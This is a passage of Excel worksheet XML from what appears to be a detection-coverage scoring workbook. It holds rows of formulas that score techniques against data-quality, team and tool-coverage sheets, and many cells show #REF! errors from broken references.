        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U117" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V117" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W117" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X117" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F117&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F117))-LEN(SUBSTITUTE(TRIM(F117),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y117" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="118" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A118" s="8" t="s">
        <v>117</v>
      </c>
      <c r="B118" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C118" s="8" t="s">
        <v>743</v>
      </c>
      <c r="D118" s="10" t="s">
        <v>744</v>
      </c>
      <c r="E118" s="10" t="s">
        <v>745</v>
      </c>
      <c r="F118" s="10" t="s">
        <v>746</v>
      </c>
      <c r="G118" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K118,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H118" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I118" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J118" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K118" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L118" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M118" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N118" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O118" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P118" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q118" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R118" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S118" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T118" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U118" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V118" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W118" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X118" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F118&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F118))-LEN(SUBSTITUTE(TRIM(F118),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y118" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="119" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A119" s="8" t="s">
        <v>75</v>
      </c>
      <c r="B119" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C119" s="8" t="s">
        <v>747</v>
      </c>
      <c r="D119" s="10" t="s">
        <v>748</v>
      </c>
      <c r="E119" s="10" t="s">
        <v>749</v>
      </c>
      <c r="F119" s="10" t="s">
        <v>750</v>
      </c>
      <c r="G119" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K119,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H119" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I119" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J119" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K119" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L119" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M119" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N119" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O119" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P119" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q119" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R119" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S119" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T119" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U119" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V119" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W119" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X119" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F119&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F119))-LEN(SUBSTITUTE(TRIM(F119),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y119" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="120" spans="1:25" ht="228" x14ac:dyDescent="0.45">
      <c r="A120" s="8" t="s">
        <v>26</v>
      </c>
      <c r="B120" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C120" s="8" t="s">
        <v>751</v>
      </c>
      <c r="D120" s="10" t="s">
        <v>752</v>
      </c>
      <c r="E120" s="10" t="s">
        <v>753</v>
      </c>
      <c r="F120" s="10" t="s">
        <v>754</v>
      </c>
      <c r="G120" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K120,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H120" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I120" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J120" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K120" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L120" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M120" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N120" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O120" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P120" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q120" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R120" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S120" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T120" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U120" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V120" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W120" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X120" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F120&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F120))-LEN(SUBSTITUTE(TRIM(F120),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y120" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="121" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A121" s="8" t="s">
        <v>63</v>
      </c>
      <c r="B121" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C121" s="8" t="s">
        <v>755</v>
      </c>
      <c r="D121" s="10" t="s">
        <v>756</v>
      </c>
      <c r="E121" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F121" s="10" t="s">
        <v>757</v>
      </c>
      <c r="G121" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K121,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H121" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I121" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J121" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K121" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L121" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M121" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N121" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O121" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P121" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q121" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R121" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S121" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T121" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U121" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V121" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W121" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X121" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F121&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F121))-LEN(SUBSTITUTE(TRIM(F121),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y121" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="122" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A122" s="8" t="s">
        <v>109</v>
      </c>
      <c r="B122" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C122" s="8" t="s">
        <v>758</v>
      </c>
      <c r="D122" s="10" t="s">
        <v>759</v>
      </c>
      <c r="E122" s="10" t="s">
        <v>760</v>
      </c>
      <c r="F122" s="10" t="s">
        <v>761</v>
      </c>
      <c r="G122" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K122,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H122" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I122" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J122" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K122" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L122" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M122" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N122" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O122" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P122" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q122" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R122" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S122" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T122" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U122" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V122" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W122" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X122" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F122&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F122))-LEN(SUBSTITUTE(TRIM(F122),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y122" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="123" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A123" s="8" t="s">
        <v>72</v>
      </c>
      <c r="B123" s="8" t="s">
        <v>710</v>
      </c>
      <c r="C123" s="8" t="s">
        <v>762</v>
      </c>
      <c r="D123" s="10" t="s">
        <v>763</v>
      </c>
      <c r="E123" s="10" t="s">
        <v>764</v>
      </c>
      <c r="F123" s="10" t="s">
        <v>765</v>
      </c>
      <c r="G123" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K123,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H123" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I123" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J123" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K123" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L123" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M123" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N123" s="20" t="e">
